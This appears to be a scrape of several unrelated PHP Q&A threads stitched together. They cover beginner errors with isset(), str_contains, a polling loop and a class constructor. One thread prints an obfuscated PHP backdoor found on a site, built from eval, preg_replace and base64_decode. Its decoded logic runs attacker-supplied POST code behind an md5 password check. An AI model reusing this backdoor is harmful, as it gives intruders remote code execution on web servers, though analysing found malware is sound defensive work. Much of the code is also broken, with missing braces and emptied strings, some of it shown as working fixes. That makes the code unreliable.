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Closed 7 years ago.
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Hi guys i'm having a small issue when i try and convert my exisiting script into a simple function. I'll leave my code below.
function service_check($postcode) {
$op_postcodes = array(... "DG10","DG3","DG4" ...);
if(isset(htmlentities($postcode))) {
$postcode_checker = trim(strtoupper(htmlentities($postcode)));
$trim_postcode = trim(substr(htmlentities($postcode_checker, 0, -3)));
if(empty($postcode_checker)) {
$error = "We require your postcode to check our service in your area.";
} else if(!valid_postcode($postcode_checker)) {
$otp = "The postcode you entered is invalid.";
} else if(!in_array($trim_postcode, $op_postcodes)) {
$otp = "Sorry, but we don't provide our service's in your area, just yet.";
} else {
$otp = "Great news! We're in your area and you are eligible to order our services!";
$_SESSION['customer_postcode'] = $postcode_checker;
} else {
$otp = "To get started please enter your postcode.";
My current usage of the function is <?php service_check($_POST['service_check']); ?>
My error is:
Fatal error: Cannot use isset() on the result of a function call (you can use "null !== func()" instead) in /home/ on line 27
change this
if(isset(htmlentities($postcode))) {
to this
$pc = htmlentities($postcode);
if(isset($pc)) {
read this if you get sometime -
Since your questions wasn't complete i assume so now an edit. The better approach could be to use !empty() instead of isset() on our if condition.
Even better, reove htmlentities method call from your if block and then later use html entities when you actually need it.
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Closed 1 year ago.
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I need to check if an URL address contains some text. so I created this code.
function url_mapping_name( $urlname ) {
if (str_contains($urlname, '')) {
echo "amazon;
if (str_contains($urlname, 'brickset')) {
echo 'brickset';
} else {
echo 'no URL';
I am trying to say.
Look for "" in $urlname, if the URL contains return amazon, if the URL contains return brickset, if nothing found return no URL
But something is wrong and I do know where I did a mistake
Thanks for helping me.
The line
echo 'amazon';
is missing a quotation mark. Note the color coding changes. That is usually caused by a missing quotation mark.
Assuming by "return" you mean having the function assign that value to a variable, all the output strings should be
return 'string';
instead of
echo 'string';
A potential additional issue is having 2 if statements instead of using else if. If you do intent to echo the strings instead of returning them, it should be like this so when it's equal to 'amazon' it doesn't also echo 'no url'
function url_mapping_name( $urlname ) {
if (str_contains($urlname, 'amazon')) {
echo 'amazon';
} else if (str_contains($urlname, 'brickset')) {
echo 'brickset';
} else {
echo 'no URL';
Thanks for the help, I used the following improvements and it works now.
I fixed the closing quote
replaced echo with return
used elseif - it returned "amazonno URL" before as #aynber wrote
function url_mapping_name( $urlname ) {
if (str_contains($urlname, '')) {
return 'amazon';
elseif (str_contains($urlname, 'brickset')) {
return 'brickset';
} else {
return 'no URL';
Thank you very much for helping me.
Closed. This question needs to be more focused. It is not currently accepting answers.
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Closed 7 years ago.
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Just a quick question....
I found a malicious file on a site (since removed) but I'm wondering what it's doing. Below is the code, any insight would be greatly appreciated.
function myfunc () {
$_myfunc1 = '63ebc49bf6d9fc5bed6af96a894db6cd';
$_myfunc2 = "\x63\x68\x72";
$_g1qm3 = $_g1qm2(115).$_g1qm2(116)."\x72".$_g1qm2(114)."\x65".$_g1qm2(118);
$_g1qm4 = $_g1qm3($_g1qm2(101).$_g1qm2(100)."\x6f\x63".$_g1qm2(101)."\x64".$_g1qm2(95).$_g1qm2(52)."\x36".$_g1qm2(101)."\x73\x61".$_g1qm2(98));
$_g1qm5 = $_g1qm3("\x65\x63".$_g1qm2(97)."\x6c\x70\x65".$_g1qm2(114)."\x5f\x67\x65".$_g1qm2(114)."\x70");
$_g1qm6 = $_g1qm3("\x6c".$_g1qm2(97)."\x76\x65");
$_g1qm5($_g1qm3('e'.$_g1qm2(47).'*./'),"#$_g1qm6($_g1qm4(\"JGxvZyA9ICdwcnQnOyBpZiAoIWlzc2V0KCRfU0VTU0lPTikpIHsgCXNlc3Npb25fc3RhcnQoKTsgfSBpZiAoaXNzZXQoJF9TRVNTSU9OWydsb2cnXSkgJiYgKCRfU0VTU0lPTlsnbG9nJ10gPT0gJGxvZykpIHsgCWlmIChpc3NldCgkX1BPU1RbJ210cSddKSkgeyAgCQkkcHQgPSBiYXNlNjRfZGVjb2RlKCRfUE9TVFsnbXRxJ10pOyAJCWV2YWwoJHB0KTsgCQlleGl0OyAJfSB9IGlmIChpc3NldCgkX1BPU1RbJ3B3eCddKSAmJiAobWQ1KCRfUE9TVFsncHd4J10pID09ICRfZzFxbTEpKSB7IAkkX1NFU1NJT05bJ2xvZyddID0gJGxvZzsgCWV4aXQ7IH0K\"))",'');} #_g1qm0();
This code is not complete but from what I've decoded it is:
$log = 'prt';
if (!isset($_SESSION)) {
if (isset($_SESSION['log']) && ($_SESSION['log'] == $log)) {
if (isset($_POST['mtq'])) {
$pt = base64_decode($_POST['mtq']);
if (isset($_POST['pwx']) && (md5($_POST['pwx']) == $_g1qm1)) {
$_SESSION['log'] = $log; exit;
So in simple words it looks from mtq param from POST request and executes it in shell. Data comes in base64 encoded format. It also stores one variable in session on key log
$_myfunc2 = "\x63\x68\x72"; it is decoded to chr which is function in PHP that returns character based on ASCII code.
$_myfunc1 = '63ebc49bf6d9fc5bed6af96a894db6cd';
looks like md5 hash but I'm not sure
$_g1qm3 = $_g1qm2(115).$_g1qm2(116)."\x72".$_g1qm2(114)."\x65".$_g1qm2(118);
It is $_g1qm3 is strrev function
$_g1qm4 = $_g1qm3($_g1qm2(101).$_g1qm2(100)."\x6f\x63".$_g1qm2(101)."\x64".$_g1qm2(95).$_g1qm2(52)."\x36".$_g1qm2(101)."\x73\x61".$_g1qm2(98));
It is base64_decode()
$_g1qm5 = $_g1qm3("\x65\x63".$_g1qm2(97)."\x6c\x70\x65".$_g1qm2(114)."\x5f\x67\x65".$_g1qm2(114)."\x70");
It's preg_replace()
$_g1qm6 = $_g1qm3("\x6c".$_g1qm2(97)."\x76\x65")
It's eval()
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Closed 7 years ago.
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I have a php file which basically reads a page using JSON and a variable is returned to it (pending/paid/expired). now my simple requirement is if the returned variable is paid/expired the respective actions for them should be taken and the loop should not be repeated but if the response is pending the code should recheck after 10 seconds. A similar cycle then happens again and so on till the loop is stopped(by receiving either a expired/paid response.
here is the code i prepared for it using the examples i found at various places but this doesnt seem to work correctly.. pls guide..
while($end==0) {
$json = file_get_contents('');
$obj = json_decode($json);
if ($result=='paid') {
p('Order Successfull');
} elseif ($result=='expired' ) {
p('status = expired');
} else {
d('status = Pending');
CODE UPDATED extra '{' removed
You have one too many curly braces.
The proper elseif and else block should look like this
} elseif ($result=='expired' ) {
p('status = expired');
} else {
It would help you a lot if you properly formatted your code.
You close the IF condition before the last ELSE just delete the closing clasp.
p('Order Successfull');
}else if($result=='expired'){
p('status = expired');
d('status = Pending');
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Closed 7 years ago.
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My Php mysql out put is array i need if string contain particular character i need print that string only
while($row2 = mysqli_fetch_array($result2)) {
echo $row2['link'];
Output is:
i need like this
if (strpos($a,'videoweed') !== false) {
echo $row2['link'];
it show out put is:
I need output only;
You have answer in your code. Just need to assemble it. check this:-
while($row2 = mysqli_fetch_array($result2)) {
if (strpos($row2['link'],'videoweed') !== false) {
echo $row2['link'];
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Closed 8 years ago.
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I'm very beginner in that I don't understand why give this error message?
Please help me. This is my first question in this site.
class shatil{
var $sat;
function __construct($my_name){//this is built in construct function
$this->sat = $my_name;
function set_sat($me_shatil){
$this->sat = $me_shatil;//you can Placement anything without'sat'
function get_sat(){
return $this->sat;
$me = new shatil();
$i = new shatil();
$me->set_sat("Muhammad Mohoshin");
$i->set_sat("Habib Shatil");
echo "My middle Name ".$me->get_sat();
echo "<br/>";
echo "My first & last Name ".$i->get_sat();
echo "<br/>";
echo "My Full Name : ".$me->sat." ".$i->sat;
echo "<br/>";
$mamun = new shatil("my name is mamun");
echo $mamun->get_sat();
This is because you don't pass any parameters to your constructor
IT should be:
$me = new shatil('name');
$i = new shatil('name2');
instead of:
$me = new shatil();
$i = new shatil();